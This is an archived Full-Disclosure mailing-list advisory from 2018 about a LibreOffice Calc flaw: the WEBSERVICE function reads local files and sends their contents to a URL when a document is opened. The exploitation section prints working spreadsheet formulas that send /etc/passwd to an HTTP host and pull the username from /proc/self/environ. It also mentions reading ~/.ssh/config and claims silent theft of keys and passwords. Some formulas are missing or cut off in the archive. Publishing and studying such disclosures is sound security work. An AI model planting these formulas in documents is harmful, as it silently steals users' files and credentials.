lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 7 Feb 2018 19:39:38 +0300
From: Mikhail Klementev <>
Subject: [FD] libreoffice remote arbitrary file disclosure


After I know that the reported vulnerability was already known to developers,
but they did not include trivial fix to 6.0, but (as the developer said, I did
not check it byself) include to 5.4.5 (it means this is a silent fixed 
vulnerability) with a month lag between updates I think it's more correct to 
full disclose it.


# Vulnerability description

## First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

The function is required to obtain data by URL, usually used as:


In original:

    For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented.

## Second part

By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.

# Exploitation

To read file you need just:


This function can also be used to send a file:

    =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.

    =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Also you can parse other files too, like a ~/.ssh/config or something like that.

For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).

# Impact

It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, support all modern versions of LibreOffice and may be embedded in almost all formats supporting by LO.

Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists